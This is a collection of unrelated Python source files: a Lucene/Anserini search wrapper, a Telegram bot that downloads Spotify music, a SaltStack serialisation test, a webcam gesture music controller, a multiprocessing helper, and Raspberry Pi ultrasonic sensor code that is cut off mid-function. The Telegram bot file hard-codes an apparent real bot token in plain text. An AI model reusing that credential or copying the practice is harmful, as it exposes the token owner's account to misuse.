def get_query_doc_scores(self, query, did, model, skip_invividual=False):
sim = self._model(model)
self._searcher().setSimilarity(sim)
ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
if ldid == -1:
return -999. * len(query), [-999.] * len(query)
analyzer = self._get_stemmed_analyzer()
#query = list(itertools.chain(*[J.A_AnalyzerUtils.tokenize(analyzer, t).toArray() for t in query]))
query = list(itertools.chain(*[J.A_AnalyzerUtils.analyze(analyzer, t).toArray() for t in query]))
if not skip_invividual:
result = []
for q in query:
q = _anserini_escape(q, J)
lquery = J.L_QueryParser().parse(q, self._primary_field)
explain = self._searcher().explain(lquery, ldid)
result.append(explain.getValue().doubleValue())
return sum(result), result
lquery = J.L_QueryParser().parse(_anserini_escape(' '.join(query), J), self._primary_field)
explain = self._searcher().explain(lquery, ldid)
return explain.getValue()
def get_query_doc_scores_batch(self, query, dids, model):
sim = self._model(model)
self._searcher().setSimilarity(sim)
ldids = {self._get_index_utils().convertDocidToLuceneDocid(did): did for did in dids}
analyzer = self._get_stemmed_analyzer()
#query = J.A_AnalyzerUtils.tokenize(analyzer, query).toArray()
query = J.A_AnalyzerUtils.analyze(analyzer, query).toArray()
query = ' '.join(_anserini_escape(q, J) for q in query)
docs = ' '.join(f'{J.A_LuceneDocumentGenerator.FIELD_ID}:{did}' for did in dids)
lquery = J.L_QueryParser().parse(f'({query}) AND ({docs})', self._primary_field)
result = {}
search_results = self._searcher().search(lquery, len(dids))
for top_doc in search_results.scoreDocs:
result[ldids[top_doc.doc]] = top_doc.score
del search_results
return result
def build(self, doc_iter, replace=False, optimize=True, store_term_weights=False):
with logger.duration(f'building {self._base_path}'):
thread_count = onir.util.safe_thread_count()
with tempfile.TemporaryDirectory() as d:
if self._settings['built']:
if replace:
logger.warn(f'removing index: {self._base_path}')
shutil.rmtree(self._base_path)
else:
logger.warn(f'adding to existing index: {self._base_path}')
fifos = []
for t in range(thread_count):
fifo = os.path.join(d, f'{t}.json')
os.mkfifo(fifo)
fifos.append(fifo)
index_args = J.A_IndexArgs()
index_args.collectionClass = 'JsonCollection'
index_args.generatorClass = 'LuceneDocumentGenerator'
index_args.threads = thread_count
index_args.input = d
index_args.index = self._base_path
index_args.storePositions = True
index_args.storeDocvectors = True
index_args.storeTermWeights = store_term_weights
index_args.keepStopwords = self._settings['keep_stops']
index_args.stemmer = self._settings['stemmer']
index_args.optimize = optimize
indexer = J.A_IndexCollection(index_args)
thread = threading.Thread(target=indexer.run)
thread.start()
time.sleep(1) # give it some time to start up, otherwise fails due to race condition
for i, doc in enumerate(doc_iter):
f = fifos[hash(i) % thread_count]
if isinstance(f, str):
f = open(f, 'wt')
fifos[hash(i) % thread_count] = f
data = {'id': doc.did, 'contents': 'a'}
data.update(doc.data)
json.dump(data, f)
f.write('\n')
for f in fifos:
if not isinstance(f, str):
f.close()
else:
with open(f, 'wt'):
pass # open and close to indicate file is done
logger.debug('waiting to join')
thread.join()
self._settings['built'] = True
self._dump_settings()
def query(self, query, model, topk, destf=None, quiet=False):
return self.batch_query([('0', query)], model, topk, destf=destf, quiet=quiet)['0']
def batch_query(self, queries, model, topk, destf=None, quiet=False):
THREADS = onir.util.safe_thread_count()
query_file_splits = 1000
if hasattr(queries, '__len__'):
if len(queries) < THREADS:
THREADS = len(queries)
query_file_splits = 1
elif len(queries) < THREADS * 10:
query_file_splits = ((len(queries)+1) // THREADS)
elif len(queries) < THREADS * 100:
query_file_splits = ((len(queries)+1) // (THREADS * 10))
else:
query_file_splits = ((len(queries)+1) // (THREADS * 100))
with tempfile.TemporaryDirectory() as topic_d, tempfile.TemporaryDirectory() as run_d:
run_f = os.path.join(run_d, 'run')
topic_files = []
file_topic_counts = []
current_file = None
total_topics = 0
for i, (qid, text) in enumerate(queries):
topic_file = '{}/{}.queries'.format(topic_d, i // query_file_splits)
if current_file is None or current_file.name != topic_file:
if current_file is not None:
topic_files.append(current_file.name)
current_file.close()
current_file = open(topic_file, 'wt')
file_topic_counts.append(0)
current_file.write(f'{qid}\t{text}\n')
file_topic_counts[-1] += 1
total_topics += 1
if current_file is not None:
topic_files.append(current_file.name)
current_file.close()
J.initialize()
with ThreadPool(THREADS) as pool, \
logger.pbar_raw(desc=f'batch_query ({model})', total=total_topics) as pbar:
def fn(inputs):
file, count = inputs
args = J.A_SearchArgs()
parser = J.M_CmdLineParser(args)
arg_args = [
'-index', self._path,
'-topics', file,
'-output', file + '.run',
'-topicreader', 'TsvString',
'-hits', str(topk),
'-stemmer', self._settings['stemmer'],
'-indexfield', self._primary_field,
]
arg_args += self._model2args(model)
parser.parseArgument(*arg_args)
searcher = J.A_SearchCollection(args)
searcher.runTopics()
searcher.close()
return file + '.run', count
if destf:
result = open(destf + '.tmp', 'wb')
else:
result = {}
for resultf, count in pool.imap_unordered(fn, zip(topic_files, file_topic_counts)):
if destf:
with open(resultf, 'rb') as f:
for line in f:
result.write(line)
else:
run = trec.read_run_dict(resultf)
result.update(run)
pbar.update(count)
if destf:
result.close()
shutil.move(destf + '.tmp', destf)
else:
return result
def _model2args(self, model):
arg_args = []
if model.startswith('bm25'):
arg_args.append('-bm25')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'k1':
arg_args.append('-bm25.k1')
arg_args.append(v)
elif k == 'b':
arg_args.append('-bm25.b')
arg_args.append(v)
elif k == 'rm3':
arg_args.append('-rm3')
elif k == 'rm3.fbTerms':
arg_args.append('-rm3.fbTerms')
arg_args.append(v)
elif k == 'rm3.fbDocs':
arg_args.append('-rm3.fbDocs')
arg_args.append(v)
elif k == 'sdm':
arg_args.append('-sdm')
elif k == 'tw':
arg_args.append('-sdm.tw')
arg_args.append(v)
elif k == 'ow':
arg_args.append('-sdm.ow')
arg_args.append(v)
elif k == 'uw':
arg_args.append('-sdm.uw')
arg_args.append(v)
else:
raise ValueError(f'unknown bm25 parameter {arg}')
elif model.startswith('ql'):
arg_args.append('-qld')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'mu':
arg_args.append('-mu')
arg_args.append(v)
else:
raise ValueError(f'unknown ql parameter {arg}')
elif model.startswith('sdm'):
arg_args.append('-sdm')
arg_args.append('-qld')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'mu':
arg_args.append('-mu')
arg_args.append(v)
elif k == 'tw':
arg_args.append('-sdm.tw')
arg_args.append(v)
elif k == 'ow':
arg_args.append('-sdm.ow')
arg_args.append(v)
elif k == 'uw':
arg_args.append('-sdm.uw')
arg_args.append(v)
else:
raise ValueError(f'unknown sdm parameter {arg}')
else:
raise ValueError(f'unknown model {model}')
return arg_args
def _anserini_escape(text, J):
text = J.L_QueryParserUtil.escape(text)
text = text.replace('<', '\\<')
text = text.replace('>', '\\>')
text = text.replace('=', '\\=')
return text
|
main.py
|
from spotify import DOWNLOADMP3 as SONGDOWNLOADER
import telepot
import spotify
import requests
import threading
token = '1898871071:AAGQ1zoSHAZPVgzWIznZelLoHedC5inbUgI'
bot = telepot.Bot(token)
sort = {}
def txtfinder(txt):
a = txt.find("https://open.spotify.com")
txt = txt[a:]
return txt
def cantfind(chat_id):
bot.sendSticker(chat_id, 'CAACAgQAAxkBAAIBE2BLNclvKLFHC-grzNdOEXKGl6cLAALzAAMSp2oDSBk1Yo7wCGUeBA')
bot.sendMessage(chat_id, "can't find it")
def cantfindone(chat_id):
bot.sendSticker(chat_id, 'CAACAgQAAxkBAAIFSWBF_m3GHUtZJxQzobvD_iWxYVClAAJuAgACh4hSOhXuVi2-7-xQHgQ')
bot.sendMessage(chat_id, "can't download one of them")
def downloader(link,chat_id,type):
PLAYLIST = False
if type=='AL':
ITEMS = spotify.album(link)
elif type == 'AR':
ITEMS = spotify.artist(link)
elif type == 'PL':
ITEMS = spotify.playlist(link)
PLAYLIST = True
else:
ITEMS = []
MESSAGE = ""
for song in ITEMS:
if PLAYLIST:
song = song['track']
MESSAGE += song['name'] + " :\n " + song['external_urls']['spotify'] + '\n\n'
bot.sendMessage(chat_id, MESSAGE)
for song in ITEMS:
if PLAYLIST:
song = song['track']
try:
SONGDOWNLOADER(song['href'], chat_id)
except:
cantfindone(chat_id)
def START(msg,chat_id):
print(f"{chat_id}:{msg}")
msglink = txtfinder(msg)
if msglink[:30]==('https://open.spotify.com/album') :
downloader(msg,chat_id,'AL')
elif msglink[:30]== ('https://open.spotify.com/track') :
try:
SONGDOWNLOADER(msg, chat_id)
except:
bot.sendSticker(chat_id,
'CAACAgQAAxkBAAIFSWBF_m3GHUtZJxQzobvD_iWxYVClAAJuAgACh4hSOhXuVi2-7-xQHgQ')
bot.sendMessage(chat_id, "can't download music")
elif msg[:33] == 'https://open.spotify.com/playlist':
downloader(msg,chat_id,'PL')
elif msglink[:31] == ('https://open.spotify.com/artist'):
downloader(msg,chat_id,'AR')
elif msg == "/start":
bot.sendMessage(chat_id,
"Hi \nsend me spotify link and I'll give you music\nor use /single or /album or "
"/artist")
elif msg == "/album":
sort[chat_id]='album'
bot.sendMessage(chat_id, 'send name and name of artist like this: \nName album\nor for better search use this:\nName album - Name artist')
elif msg == '/single':
sort[chat_id]='single'
bot.sendMessage(chat_id,'send name and name of artist like this: \nName song\nor for better search use this:\nName song - Name artist')
elif msg == '/artist':
sort[chat_id]='artist'
bot.sendMessage(chat_id,'send name and name of artist like this: \nName artist')
else:
try:
if sort[chat_id]=='artist':
try:
downloader(spotify.searchartist(msg),chat_id,'AR')
del sort[chat_id]
except:
cantfind(chat_id)
elif sort[chat_id]=='album':
try:
downloader(spotify.searchalbum(msg),chat_id,'AL')
del sort[chat_id]
except:
cantfind(chat_id)
elif sort[chat_id]=='single':
try:
SONGDOWNLOADER(spotify.searchsingle(msg), chat_id)
del sort[chat_id]
except:
cantfind(chat_id)
except:
bot.sendSticker(chat_id, 'CAACAgQAAxkBAAIBFGBLNcpfFcTLxnn5lR20ZbE2EJbrAAJRAQACEqdqA2XZDc7OSUrIHgQ')
bot.sendMessage(chat_id,'send me link or use /single or /album or /artist')
print('Listening ...')
tokenurl = f'https://api.telegram.org/bot{token}'
Update = tokenurl+"/getUpdates"
def UPDATE():
MESSAGES = requests.get(Update).json()
return MESSAGES['result']
while 1:
if threading.activeCount()-1 < 15:
try:
for message in UPDATE():
offset = message['update_id']+1
offset = Update+f"?offset={offset}"
offset = requests.post(offset)
msg = message['message']['text']
chat_id = message['message']['from']['id']
thread = threading.Thread(target=START,args=(msg,chat_id))
thread.start()
except:
pass
|
test_payload.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: Pedro Algarvio (pedro@algarvio.me)
tests.unit.payload_test
~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import time
import errno
import threading
import datetime
# Import Salt Testing libs
from tests.support.unit import skipIf, TestCase
from tests.support.mock import NO_MOCK, NO_MOCK_REASON
# Import Salt libs
from salt.utils import immutabletypes
from salt.utils.odict import OrderedDict
import salt.exceptions
import salt.payload
# Import 3rd-party libs
import zmq
from salt.ext import six
import logging
log = logging.getLogger(__name__)
@skipIf(NO_MOCK, NO_MOCK_REASON)
class PayloadTestCase(TestCase):
def assertNoOrderedDict(self, data):
if isinstance(data, OrderedDict):
raise AssertionError(
'Found an ordered dictionary'
)
if isinstance(data, dict):
for value in six.itervalues(data):
self.assertNoOrderedDict(value)
elif isinstance(data, (list, tuple)):
for chunk in data:
self.assertNoOrderedDict(chunk)
def test_list_nested_odicts(self):
payload = salt.payload.Serial('msgpack')
idata = {'pillar': [OrderedDict(environment='dev')]}
odata = payload.loads(payload.dumps(idata.copy()))
self.assertNoOrderedDict(odata)
self.assertEqual(idata, odata)
def test_datetime_dump_load(self):
'''
Check the custom datetime handler can understand itself
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
idata = {dtvalue: dtvalue}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata)
self.assertEqual(
sdata,
b'\x81\xc7\x18N20010203T04:05:06.000007\xc7\x18N20010203T04:05:06.000007')
self.assertEqual(idata, odata)
def test_verylong_dump_load(self):
'''
Test verylong encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'jid': 20180227140750302662}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata)
idata['jid'] = '{0}'.format(idata['jid'])
self.assertEqual(idata, odata)
def test_immutable_dict_dump_load(self):
'''
Test immutable dict encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'dict': {'key': 'value'}}
sdata = payload.dumps({'dict': immutabletypes.ImmutableDict(idata['dict'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_immutable_list_dump_load(self):
'''
Test immutable list encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'list': [1, 2, 3]}
sdata = payload.dumps({'list': immutabletypes.ImmutableList(idata['list'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_immutable_set_dump_load(self):
'''
Test immutable set encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'set': ['red', 'green', 'blue']}
sdata = payload.dumps({'set': immutabletypes.ImmutableSet(idata['set'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_odict_dump_load(self):
'''
Test odict just works. It wasn't until msgpack 0.2.0
'''
payload = salt.payload.Serial('msgpack')
data = OrderedDict()
data['a'] = 'b'
data['y'] = 'z'
data['j'] = 'k'
data['w'] = 'x'
sdata = payload.dumps({'set': data})
odata = payload.loads(sdata)
self.assertEqual({'set': dict(data)}, odata)
def test_mixed_dump_load(self):
'''
Test we can handle all exceptions at once
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
od = OrderedDict()
od['a'] = 'b'
od['y'] = 'z'
od['j'] = 'k'
od['w'] = 'x'
idata = {dtvalue: dtvalue, # datetime
'jid': 20180227140750302662, # long int
'dict': immutabletypes.ImmutableDict({'key': 'value'}), # immutable dict
'list': immutabletypes.ImmutableList([1, 2, 3]), # immutable list
'set': immutabletypes.ImmutableSet(('red', 'green', 'blue')), # immutable set
'odict': od, # odict
}
edata = {dtvalue: dtvalue, # datetime, == input
'jid': '20180227140750302662', # string repr of long int
'dict': {'key': 'value'}, # builtin dict
'list': [1, 2, 3], # builtin list
'set': ['red', 'green', 'blue'], # builtin set
'odict': dict(od), # builtin dict
}
sdata = payload.dumps(idata)
odata = payload.loads(sdata)
self.assertEqual(edata, odata)
class SREQTestCase(TestCase):
port = 8845 # TODO: dynamically assign a port?
@classmethod
def setUpClass(cls):
'''
Class to set up zmq echo socket
'''
def echo_server():
'''
A server that echos the message sent to it over zmq
Optional "sleep" can be sent to delay response
'''
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:{0}".format(SREQTestCase.port))
payload = salt.payload.Serial('msgpack')
while SREQTestCase.thread_running.is_set():
try:
# Wait for next request from client
message = socket.recv(zmq.NOBLOCK)
msg_deserialized = payload.loads(message)
log.info('Echo server received message: %s', msg_deserialized)
if isinstance(msg_deserialized['load'], dict) and msg_deserialized['load'].get('sleep'):
log.info('Test echo server sleeping for %s seconds',
msg_deserialized['load']['sleep'])
time.sleep(msg_deserialized['load']['sleep'])
socket.send(message)
except zmq.ZMQError as exc:
if exc.errno == errno.EAGAIN:
continue
raise
SREQTestCase.thread_running = threading.Event()
SREQTestCase.thread_running.set()
SREQTestCase.echo_server = threading.Thread(target=echo_server)
SREQTestCase.echo_server.start()
@classmethod
def tearDownClass(cls):
'''
Remove echo server
'''
# kill the thread
SREQTestCase.thread_running.clear()
SREQTestCase.echo_server.join()
def get_sreq(self):
return salt.payload.SREQ('tcp://127.0.0.1:{0}'.format(SREQTestCase.port))
def test_send_auto(self):
'''
Test creation, send/rect
'''
sreq = self.get_sreq()
# check default of empty load and enc clear
assert sreq.send_auto({}) == {'enc': 'clear', 'load': {}}
# check that the load always gets passed
assert sreq.send_auto({'load': 'foo'}) == {'load': 'foo', 'enc': 'clear'}
def test_send(self):
sreq = self.get_sreq()
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
@skipIf(True, 'Disabled until we can figure out how to make this more reliable.')
def test_timeout(self):
'''
Test SREQ Timeouts
'''
sreq = self.get_sreq()
# client-side timeout
start = time.time()
# This is a try/except instead of an assertRaises because of a possible
# subtle bug in zmq wherein a timeout=0 actually exceutes a single poll
# before the timeout is reached.
log.info('Sending tries=0, timeout=0')
try:
sreq.send('clear', 'foo', tries=0, timeout=0)
except salt.exceptions.SaltReqTimeoutError:
pass
assert time.time() - start < 1 # ensure we didn't wait
# server-side timeout
log.info('Sending tries=1, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=1, timeout=1)
assert time.time() - start >= 1 # ensure we actually tried once (1s)
# server-side timeout with retries
log.info('Sending tries=2, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=2, timeout=1)
assert time.time() - start >= 2 # ensure we actually tried twice (2s)
# test a regular send afterwards (to make sure sockets aren't in a twist
log.info('Sending regular send')
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
def test_destroy(self):
'''
Test the __del__ capabilities
'''
sreq = self.get_sreq()
# ensure no exceptions when we go to destroy the sreq, since __del__
# swallows exceptions, we have to call destroy directly
sreq.destroy()
|
PlaybackDetector.py
|
import time
import tkinter as tk
import HandTrackModule
import math
import Player
import cv2
import numpy as np
import threading
import os
class PlaybackDetector():
def __init__(self,mode=False,maxHands=1,detectionCon=0.5,trackCon=0.5):
self.handDetector=HandTrackModule.handDetector(mode,maxHands,detectionCon,trackCon)
self.fingertipindex=[4,8,12,16,20]
self.timeMode={}
self.mode="Pause"
self.volmmode=False
self.changeTrackMode=False
self.changeTrackFlag=False
#Intialize Player: Thread1
def inplayer():
self.root = tk.Tk()
self.root.geometry('600x400')
self.root.wm_title('Vison Audio')
self.app = Player.Player(master=self.root)
self.app.mainloop()
# getting Predictions: Thread2
def inpredict():
ptime = 0
cap = cv2.VideoCapture(0)
while True:
ret, self.img = cap.read()
self.img = cv2.flip(self.img, 1)
self.img = cv2.resize(self.img, (640,480), interpolation=cv2.INTER_AREA)
# print(self.img.shape)
if ret == False:
break
#Calculate FrameRate
self.detect(self.img)
self.ctime = time.time()
fps = 1 / (self.ctime - ptime)
ptime = self.ctime
cv2.putText(self.img, "framerate: "+str(int(fps)), (440, 120), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,255,255), 2)
#Displaying Predictions
cv2.imshow("Gesture Detection", self.img)
k = cv2.waitKey(1)
if k == 27:
break
cv2.destroyAllWindows()
cap.release()
#Multithreding
threading.Thread(target=inplayer).start()
threading.Thread(target=inpredict).start()
def detect(self,img):
self.prevmode=self.mode
self.handDetector.findHands(img)
self.lmlist=self.handDetector.findPosition(img)
if len(self.lmlist) != 0:
self.fingercount, self.fingerlist = self.handDetector.countTheFingersUp(img)
#For volume and changetrack modes
if self.fingerlist == [1,1,0,0,0]:
self.volmmode= True
elif self.fingerlist==[0 , 1, 1, 1, 1]:
self.changeTrackMode=True
else:
self.changeTrackMode=False
self.volmmode = False
self.changeTrackFlag=False
#For PlayPause
if self.fingerlist == [1, 1, 1, 1, 1]:
self.mode = "Play"
#Visualizations
cv2.rectangle(img, (0, 0), (img.shape[1], 80), (255, 0, 0), -1)
cv2.putText(img, "Playing: ", (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 72, 255), 2)
cv2.putText(img, os.path.basename(self.app.playlist[self.app.current]), (70, 60), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,255,0), 2)
elif self.fingerlist == [0,0,0,0,0]:
self.mode= "Pause"
#Visualizations
cv2.rectangle(img, (0, 0), (img.shape[1], 80), (255, 0, 0), -1)
cv2.putText(img, "Paused", (180, 60), cv2.FONT_HERSHEY_TRIPLEX, 2, (0, 0, 255), 5)
for id in self.fingertipindex:
cv2.circle(self.img,(self.lmlist[id][1],self.lmlist[id][2]),4,(0,0,255),-1)
# call volume function
if self.volmmode== True:
self.changeVol(img)
# Call change track function
elif self.changeTrackMode== True:
cv2.rectangle(img, (0, 0), (img.shape[1], 80), (255, 0, 0), -1)
cv2.putText(img, "Change Track", (100,60), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 5)
p11 = (80, 20)
p12 = (50, 40)
p13 = (80, 60)
cv2.line(img, p11, p12, (0, 0, 255), 3)
cv2.line(img, p12, p13, (0, 0, 255), 3)
cv2.line(img, p13, p11, (0, 0, 255), 3)
p21 = (545, 20)
p22 = (575, 40)
p23 = (545, 60)
cv2.line(img, p21, p22, (0, 0, 255), 3)
cv2.line(img, p22, p23, (0, 0, 255), 3)
cv2.line(img, p23, p21, (0, 0, 255), 3)
for id in self.fingertipindex[1:]:
cv2.circle(self.img,(self.lmlist[id][1],self.lmlist[id][2]),4,(0,0,255),-1)
self.changeTrack()
# call function for play pause
else:
self.checkplaypause()
def checkplaypause(self):
if self.prevmode!= self.mode and self.mode=='Play' and self.app.paused== True: #For continue
self.app.pause_song()
elif self.prevmode!= self.mode and self.mode=='Pause' and self.app.paused == False: #For pause
self.app.pause_song()
def changeVol(self,img):
x1,y1= self.lmlist[4][1],self.lmlist[4][2]
x2, y2 = self.lmlist[8][1], self.lmlist[8][2]
dist = math.hypot(x2 - x1, y2 - y1)
lowerdist=50
maxdist=230
vol=np.interp(dist,[lowerdist,maxdist],[0,10])
self.app.change_volume_vision(vol)
# Visualizations
cv2.rectangle(img, (0, 0), (img.shape[1], 80),(255,0,0) , -1)
cv2.putText(img,"Change Volume",(60,60),cv2.FONT_HERSHEY_TRIPLEX,2,(0, 72, 255),5)
cv2.line(img, (x1, y1), (x2, y2), (0, 72, 255), 6)
cv2.circle(img, (x1, y1), 6, (0, 0, 255), -1)
cv2.circle(img, (x2, y2), 6, (0, 0, 255), -1)
scaleforrec = np.interp(dist, [lowerdist,maxdist], [400,120])
# print(scale)
if vol < 8:
cv2.rectangle(self.img, (20, 120), (60, 400), (0, 255, 0), 2)
cv2.rectangle(self.img, (20, 400), (60, int(scaleforrec)), (0, 255, 0), -1)
cv2.putText(self.img, "Volume", (10, 430), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,255,0), 2)
cv2.putText(self.img, str(round(vol*10))+"%", (20, 110), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 255, 0), 2)
# print("<0.8")
elif vol >= 8:
cv2.rectangle(self.img, (20, 120), (60, 400), (0, 0,255), 2)
cv2.rectangle(self.img, (20, 400), (60, int(scaleforrec)), (0 ,0, 255), -1)
cv2.putText(self.img, "Volume", (10, 430), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1,(0, 0, 255), 2)
cv2.putText(self.img, str(round(vol*10))+"%", (20, 110), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# print(">0.8")
def changeTrack(self):
self.timeMode[round(float(time.time()),1)]= self.lmlist[8][1]
try:
if len(self.timeMode)> 10:
if self.lmlist[8][1]< self.timeMode[round(float(time.time()),1)-1]-150 and self.changeTrackFlag==False:
self.app.prev_song()
self.changeTrackFlag=True
elif self.lmlist[8][1]> self.timeMode[round(float(time.time()),1)-1]+150 and self.changeTrackFlag==False:
self.app.next_song()
self.changeTrackFlag =True
except Exception as e:
pass
def main():
play=PlaybackDetector()
if __name__ == "__main__":
main()
|
Processing.py
|
#! /usr/bin/env python
#-----------------------------------------#
# Copyright [2015] [Kelcey Jamison-Damage]
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Imports
#-----------------------------------------------------------------------#
import sys, os, time
import time
from random import randint
from multiprocessing import Process, Pool, Queue
# Processing Class
#-----------------------------------------------------------------------#
class Processing(object):
"""docstring for Processing"""
def __init__(self):
super(Processing, self).__init__()
pass
# Processing wrapper methods
#-----------------------------------------------------------------------#
def create_queue(self):
queue = Queue()
return queue
def generate_pool(self, processes=4):
pool = Pool(processes)
return pool
def new_process_pool(self, pool, func, data):
result = pool.apply_async(func, data)
return result
def new_process(self, func, data):
process = Process(target=func, args=data)
process.start()
return process
def new_process_map(self, pool, func, data, data2='', data3=''):
result = pool.map(func, [data])
return result
|
ultrasonic.py
|
import RPi.GPIO as GPIO
import time
import threading
from servos import Servos, ServoEnd, ServoDirection
class DistanceSensors:
def __init__(self):
self.GPIO_FRONTTRIGGER = 20
self.GPIO_BACKTRIGGER = 5
self.GPIO_FRONTECHO = 6
self.GPIO_BACKECHO = 12
FRONTSERVO = 6
BACKSERVO = 7
#set GPIO direction (IN / OUT)
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.GPIO_FRONTECHO, GPIO.IN)
GPIO.setup(self.GPIO_BACKECHO, GPIO.IN)
GPIO.setup(self.GPIO_FRONTTRIGGER, GPIO.OUT)
GPIO.output(self.GPIO_FRONTTRIGGER, False)
GPIO.setup(self.GPIO_BACKTRIGGER, GPIO.OUT)
GPIO.output(self.GPIO_BACKTRIGGER, False)
# initialise direction servos
self.servos = Servos(FRONTSERVO, BACKSERVO)
servoPositions = self.servos.FirstScanPosition()
self.frontServoDirection = servoPositions[0]
self.backServoDirection = servoPositions[1]
self.scannerActive = False
self.endthread = False
self.HistoryFront = [[0.0, 0.0, 0.0, 0.0, 0.0]]
self.HistoryBack = [[0.0, 0.0, 0.0, 0.0, 0.0]]
self.FrontDeltas = [[0.0, 0.0, 0.0, 0.0, 0.0]]
self.BackDeltas = [[0.0, 0.0, 0.0, 0.0, 0.0]]
self.FrontDeltaDelta = [0.0, 0.0, 0.0, 0.0, 0.0]
self.BackDeltaDelta = [0.0, 0.0, 0.0, 0.0, 0.0]
# initialise current distance readings
self.frontDistance = {
ServoDirection.Left: -1.0,
ServoDirection.OffLeft: -1.0,
ServoDirection.Ahead: -1.0,
ServoDirection.OffRight: -1.0,
ServoDirection.Right: -1.0
}
self.backDistance = {
ServoDirection.Left: -1.0,
ServoDirection.OffLeft: -1.0,
ServoDirection.Ahead: -1.0,
ServoDirection.OffRight: -1.0,
ServoDirection.Right: -1.0
}
time.sleep(1)
def UpdateStatistics(self):
if len(self.HistoryFront) == 1:
self.HistoryFront = [[self.frontDistance[ServoDirection.Left],
self.frontDistance[ServoDirection.OffLeft],
self.frontDistance[ServoDirection.Ahead],
self.frontDistance[ServoDirection.OffRight],
self.frontDistance[ServoDirection.Right]]]
self.HistoryBack = [[self.backDistance[ServoDirection.Left],
self.backDistance[ServoDirection.OffLeft],
self.backDistance[ServoDirection.Ahead],
self.backDistance[ServoDirection.OffRight],
self.backDistance[ServoDirection.Right]]]
self.HistoryFront += [[self.frontDistance[ServoDirection.Left],
self.frontDistance[ServoDirection.OffLeft],
self.frontDistance[ServoDirection.Ahead],
self.frontDistance[ServoDirection.OffRight],
self.frontDistance[ServoDirection.Right]]]
self.HistoryBack += [[self.backDistance[ServoDirection.Left],
self.backDistance[ServoDirection.OffLeft],
self.backDistance[ServoDirection.Ahead],
self.backDistance[ServoDirection.OffRight],
self.backDistance[ServoDirection.Right]]]
self.FrontDeltas += [[round(self.HistoryFront[-1][0] - self.HistoryFront[-2][0], 1),
round(self.HistoryFront[-1][1] - self.HistoryFront[-2][1], 1),
round(self.HistoryFront[-1][2] - self.HistoryFront[-2][2], 1),
round(self.HistoryFront[-1][3] - self.HistoryFront[-2][3], 1),
round(self.HistoryFront[-1][4] - self.HistoryFront[-2][4], 1)]]
self.BackDeltas += [[round(self.HistoryBack[-1][0] - self.HistoryBack[-2][0], 1),
round(self.HistoryBack[-1][1] - self.HistoryBack[-2][1], 1),
round(self.HistoryBack[-1][2] - self.HistoryBack[-2][2], 1),
round(self.HistoryBack[-1][3] - self.HistoryBack[-2][3], 1),
round(self.HistoryBack[-1][4] - self.HistoryBack[-2][4], 1)]]
# only keep the most recent 10 entries
if (len(self.HistoryFront) > 10):
del self.HistoryFront[0]
del self.HistoryBack[0]
del self.FrontDeltas[0]
del self.BackDeltas[0]
self.FrontDeltaDelta = [0.0, 0.0, 0.0, 0.0, 0.0]
self.BackDeltaDelta = [0.0, 0.0, 0.0, 0.0, 0.0]
for j in range(0, min(5, len(self.FrontDeltas))):
for i in range(0, 4):
self.FrontDeltaDelta[i] += self.FrontDeltas[j][i]
self.BackDeltaDelta[i] += self.BackDeltas[j][i]
for i in range(0, 4):
self.FrontDeltaDelta[i] = round(self.FrontDeltaDelta[i], 1)
self.BackDeltaDelta[i] = round(self.BackDeltaDelta[i], 1)
# threaded function
def GetDistance(self, delay):
while not(self.endthread):
frontError = backError = False
# Activate echo trigger (this is shared between front and rear sensors)
GPIO.output(self.GPIO_FRONTTRIGGER, True)
time.sleep(0.00001)
GPIO.output(self.GPIO_FRONTTRIGGER, False)
frontStartTime = frontStopTime = time.time()
while GPIO.input(self.GPIO_FRONTECHO) == 0:
frontStartTime = time.time()
if frontStartTime - frontStopTime > 0.02:
frontError = True
break
while GPIO.input(self.GPIO_FRONTECHO) == 1 and not(frontError):
frontStopTime = time.time()
